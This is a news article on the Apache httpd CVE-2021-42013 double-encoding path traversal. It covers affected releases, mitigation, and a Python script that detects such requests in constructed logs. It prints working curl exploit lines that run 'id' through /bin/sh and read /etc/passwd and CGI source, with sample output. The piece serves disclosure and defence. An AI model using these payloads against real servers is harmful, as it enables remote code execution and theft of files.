Another vulnerability in Apache httpd allowing access outside the site root directory

A new attack has been identified against the Apache http server, one that was not fixed in update 2.4.50 and that allows access to files located outside the site root directory. In addition, researchers have found a way that, given certain non-standard settings, allows not only reading system files but also remotely executing code on the server. The problem appears only in releases 2.4.49 and 2.4.50; earlier versions are not affected. To eliminate the new vulnerability, Apache httpd 2.4.51 was promptly released.

In essence, the new problem (CVE-2021-42013) is completely similar to the original vulnerability (CVE-2021-41773) in 2.4.49, the only difference being a different encoding of the ".." characters. In particular, release 2.4.50 blocked the ability to use the "%2e" sequence to encode a dot, but missed the possibility of double encoding: when the sequence "%%32%65" is specified, the server first decodes it into "%2e" and then into ".", i.e. the "../" characters for moving to the parent directory can be encoded as ".%%32%65/".

As for exploiting the vulnerability for code execution, this is possible when mod_cgi is enabled and a base path is used in which execution of CGI scripts is allowed (for example, if the ScriptAlias directive is enabled or the ExecCGI flag is specified in the Options directive). A mandatory condition for a successful attack is also that access to directories with executable files, such as /bin, or access to the file system root "/", is explicitly granted in the Apache settings. Since such access is not normally granted, code execution attacks have little relevance for real systems.

At the same time, the attack to obtain the contents of arbitrary system files and the source texts of web scripts that are readable by the user under which the http server runs remains relevant. To carry out such an attack, it is sufficient that the site has a directory configured using the "Alias" or "ScriptAlias" directives (DocumentRoot is not enough), such as "cgi-bin".

An exploitation example that allows running the "id" utility on the server:

curl 'http://192.168.0.1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'

uid=1(daemon) gid=1(daemon) groups=1(daemon)

An exploitation example that allows displaying the contents of /etc/passwd and one of the web scripts (to extract the script's code, a directory defined via the "Alias" directive, in which script execution is not allowed, must be specified as the base directory):

curl 'http://192.168.0.1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'

curl 'http://192.168.0.1/aliaseddir/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/usr/local/apache2/cgi-bin/test.cgi'
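The double-encoding step described above (".%%32%65/" becoming ".%2e/" after one decode and "../" after a second) is easy to miss in any component that percent-decodes a path once and then normalizes it. The following Python script is an added illustration, not Apache's own code: it shows why a single-pass decoder accepts the request paths from the examples above as harmless segment names, implements a decode-to-fixpoint check that rejects any path climbing above its root, and runs that check over a few constructed access-log lines of the kind an httpd "combined" log would contain. The log lines, IP addresses and paths are constructed for the demo.

```python
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 4  # bound the loop; a legitimate path settles in one or two rounds


def decode_fully(path: str) -> str:
    """Percent-decode repeatedly until the string stops changing.

    unquote() leaves a '%' that is not followed by two hex digits alone, so
    '%%32%65' decodes to '%2e' in the first round and to '.' in the second.
    """
    prev = path
    for _ in range(MAX_DECODE_ROUNDS):
        cur = unquote(prev)
        if cur == prev:
            return cur
        prev = cur
    return prev


def escapes_root(path: str, single_pass: bool = False) -> bool:
    """Return True if the decoded path ever walks above its root directory.

    single_pass=True mimics a decoder that decodes only once before
    normalizing: '.%2e' and '.%%32%65' then look like ordinary file names.
    """
    decoded = unquote(path) if single_pass else decode_fully(path)
    depth = 0
    for segment in decoded.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


# Request line as logged by the '%r' format item: method, raw target, protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def flag_traversal(log_text: str) -> list:
    """Return (line number, raw path) for every request whose path escapes the root."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        raw_path = m.group("target").split("?", 1)[0]  # drop the query string
        if escapes_root(raw_path):
            hits.append((lineno, raw_path))
    return hits


# Constructed sample log (combined format); not taken from any real server.
CONSTRUCTED_LOG = """\
192.0.2.10 - - [05/Oct/2021:10:00:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "curl/7.79.1"
192.0.2.11 - - [05/Oct/2021:10:00:02 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 403 199 "-" "curl/7.79.1"
192.0.2.12 - - [05/Oct/2021:10:00:03 +0000] "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 200 1342 "-" "curl/7.79.1"
192.0.2.13 - - [05/Oct/2021:10:00:04 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 52 "-" "curl/7.79.1"
"""

if __name__ == "__main__":
    sample = "/cgi-bin/.%%32%65/.%%32%65/bin/sh"
    print("single-pass decoder flags it:", escapes_root(sample, single_pass=True))
    print("fixpoint decoder flags it:   ", escapes_root(sample))
    for lineno, raw_path in flag_traversal(CONSTRUCTED_LOG):
        print(f"line {lineno}: {raw_path} -> {decode_fully(raw_path)}")
```

The single-pass check returns False for the double-encoded path while the fixpoint check returns True, which is the gap between 2.4.50 and 2.4.51 in miniature. The scanner also catches the plain "%2e" form from CVE-2021-41773, so one rule covers both advisories; in practice you would run it over the raw request target from the access log rather than over any already-decoded field, since decoding is exactly what hides the pattern.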

The problem mostly affects continuously updated distributions such as Fedora, Arch Linux and Gentoo, as well as the FreeBSD ports. Packages in the stable branches of the conservative distributions Debian, RHEL, Ubuntu and SUSE are not affected by the vulnerability. The problem does not occur if access to directories is explicitly denied using the "require all denied" setting.

Source: opennet.ru
